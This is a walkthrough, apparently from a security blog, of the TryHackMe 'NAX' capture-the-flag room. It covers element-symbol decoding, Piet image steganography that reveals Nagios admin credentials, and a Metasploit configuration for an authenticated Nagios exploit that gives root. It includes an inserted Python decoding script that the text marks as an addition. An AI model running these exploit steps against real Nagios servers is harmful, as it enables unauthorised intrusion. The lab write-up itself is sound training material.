SecWalk.com

THM Walkthrough NAX

NAX is a machine released by TryHackMe.

https://tryhackme.com/room/nax

Summary

The website shows a weird page which turns out to be chemical elements. After solving this puzzle we are able to download an image file. When we do some stego stuff, we are able to get some credentials for Nagios. There is an authenticated Nagios exploit available. After executing it we were able to get root on the box.

Enumeration

Nmap Scan

nmap -sV -sC  10.10.233.26

Web Page

When we go to the webpage, we see the following.

‘Decrypting’ the chemistry elements

This seems to be some kind of chemistry. (Ag – Hg – Ta – Sb – Po – Pd – Hg – Pt – Lr)

After some time, I googled: chemistry elements

Then I saw the following table.

Now each element represents a number:

Ag = 47

Hg = 80

Ta = 73

Sb = 51

Po = 84

Pd = 46

Hg = 80

Pt = 78  

Lr = 103

Now we place those numbers behind each other.

47 80 73 51 84 46 80 78 103

Converting ASCII to text

Resource: https://convert.town/ascii-to-text

Now I put those numbers into the webpage table.

We found a new URL/image.

/PI3T.PNg
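The decoding above can also be done offline instead of through a conversion website. The script below is an added example, not part of the original walkthrough; the names decode_elements, encode_text and ATOMIC_NUMBER are made up for this illustration. It generalizes the lookup to any element string and rejects symbols that do not exist or that map to non-printable ASCII.

```python
import re

# Element symbols in atomic-number order (first entry is hydrogen, Z = 1).
_SYMBOLS = (
    "H He Li Be B C N O F Ne Na Mg Al Si P S Cl Ar K Ca Sc Ti V Cr Mn Fe Co Ni "
    "Cu Zn Ga Ge As Se Br Kr Rb Sr Y Zr Nb Mo Tc Ru Rh Pd Ag Cd In Sn Sb Te I Xe "
    "Cs Ba La Ce Pr Nd Pm Sm Eu Gd Tb Dy Ho Er Tm Yb Lu Hf Ta W Re Os Ir Pt Au Hg "
    "Tl Pb Bi Po At Rn Fr Ra Ac Th Pa U Np Pu Am Cm Bk Cf Es Fm Md No Lr Rf Db Sg "
    "Bh Hs Mt Ds Rg Cn Nh Fl Mc Lv Ts Og"
).split()

# Symbol -> atomic number, e.g. "Ag" -> 47.
ATOMIC_NUMBER = {sym: z for z, sym in enumerate(_SYMBOLS, start=1)}


def decode_elements(cipher: str) -> str:
    """Map each element symbol to its atomic number, then to an ASCII char."""
    chars = []
    for token in re.findall(r"[A-Za-z]+", cipher):  # skips dashes and spaces
        symbol = token.capitalize()  # tolerate "AG" or "ag"
        if symbol not in ATOMIC_NUMBER:
            raise ValueError(f"unknown element symbol: {token!r}")
        z = ATOMIC_NUMBER[symbol]
        if z < 32:  # below 32 is an ASCII control character, not text
            raise ValueError(f"{symbol} (Z={z}) is not printable ASCII")
        chars.append(chr(z))
    return "".join(chars)


def encode_text(text: str) -> str:
    """Inverse mapping: ASCII text -> element symbols, for checking a decode."""
    symbols = []
    for ch in text:
        z = ord(ch)
        if not 32 <= z <= len(_SYMBOLS):  # only Z = 32..118 is representable
            raise ValueError(f"{ch!r} has no element with atomic number {z}")
        symbols.append(_SYMBOLS[z - 1])
    return " - ".join(symbols)


if __name__ == "__main__":
    # Element string as shown on the room's web page.
    page_text = "Ag – Hg – Ta – Sb – Po – Pd – Hg – Pt – Lr"
    print(decode_elements(page_text))
```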

 

Downloading Image

In order to get the image on the system, I download it.

wget http://10.10.233.26/PI3T.PNg


Stego Stuff

Now I performed some basic stego stuff.

exiftool PI3T.PNg

We see the artist is Piet Mondrian.

So, I searched for:

                Piet Mondrian crypto

Then I saw this reddit page:

From this Reddit page, I came to a webpage.

https://www.dangermouse.net/esoteric/piet.html

After reading this I googled the following.

https://www.bertnase.de/npiet/npiet-execute.php

Extract information from the image.

After we upload and execute it we see the following.

Some credentials for something called Nagios.

nagiosadmin:n3p3UQ&9BjLp4$7uhWdY

Locating the right exploit

searchsploit Nagios

We can use this exploit, because we already have the credentials to log in.

Configuring msf exploit

Commands which I used to configure the exploit correctly.

set PASSWORD n3p3UQ&9BjLp4$7uhWdY

set USERNAME nagiosadmin

set rhosts  10.10.233.26

set lhost tun0

exploit

We are root now.

Made by Icel0rd
